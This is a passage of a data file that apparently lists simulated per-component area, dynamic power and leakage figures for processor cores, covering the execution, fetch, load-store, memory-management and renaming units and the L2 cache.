'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.01823,
'Load Store Unit/Runtime Dynamic': 0.485965,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0540262,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.108052,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0191741,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0201394,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.156543,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0294315,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.348189,
'Memory Management Unit/Runtime Dynamic': 0.0495709,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 17.0105,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.00785316,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.080835,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.0886882,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 2.51572,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0546638,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.0881707,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0445056,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.18734,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0625195,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 3.94504,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00229285,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0165802,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.016957,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0165802,
'Execution Unit/Register Files/Runtime Dynamic': 0.0192499,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0349298,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.0977856,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 0.912441,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000557349,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000557349,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000490241,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000192401,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000243589,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00184853,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00517265,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0163012,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.0369,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0735861,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0553662,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.30573,
'Instruction Fetch Unit/Runtime Dynamic': 0.152275,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0264796,
'L2/Runtime Dynamic': 0.00805188,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.51207,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.144867,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.00889525,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.00889527,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 1.55407,
'Load Store Unit/Runtime Dynamic': 0.197631,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0219342,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.0438684,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0077845,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.00818205,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.0644703,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0120637,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.233952,
'Memory Management Unit/Runtime Dynamic': 0.0202458,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 12.6547,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00246628,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0281416,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0306079,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.32125,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0547513,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.0883119,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0445769,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.18764,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0626196,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 3.94523,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00229652,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0166067,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0169842,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0166067,
'Execution Unit/Register Files/Runtime Dynamic': 0.0192807,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0349857,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.0978784,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 0.912865,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000558191,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000558191,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000491075,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000192778,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000243979,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00185144,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00517713,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0163273,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.03856,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0735756,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0554549,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.30747,
'Instruction Fetch Unit/Runtime Dynamic': 0.152386,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0265203,
'L2/Runtime Dynamic': 0.00810344,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.51179,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.144816,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0088863,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.00888623,
